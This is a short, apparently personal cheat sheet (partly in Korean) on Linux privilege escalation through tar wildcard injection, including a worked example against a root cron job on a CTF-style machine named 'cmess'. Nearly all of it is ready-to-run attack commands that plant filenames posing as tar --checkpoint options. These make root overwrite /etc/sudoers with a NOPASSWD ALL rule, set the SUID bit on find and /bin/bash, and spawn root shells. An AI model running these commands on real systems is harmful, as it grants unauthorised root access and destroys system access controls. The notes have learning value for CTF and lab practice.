sudo tar cf archive.tar * --checkpoint=1 --checkpoint-action=exec=/bin/bash
sudoers fileecho 'echo "wook ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \\;
root
find f1 -exec "/bin/sh" \\;
id
whoami
---
# OR more simply
echo "chmod +s /bin/bash" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
Cron job + Wildcard injection
andre@cmess:~/backup$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
cd /home/andre/backup
# 악성 파일 생성
echo 'chmod +s /bin/bash' > shell.sh
chmod +x shell.sh
# 트리거 파일 생성
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
# 트리거 파일 생성 중 에러 나는 경우
# 옵션이 아니라 파일명이라는 것을 알려줘야함
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
# 혹은
touch /home/andre/backup --checkpoint=1
touch /home/andre/backup --checkpoint-action=exec=sh\\ shell.sh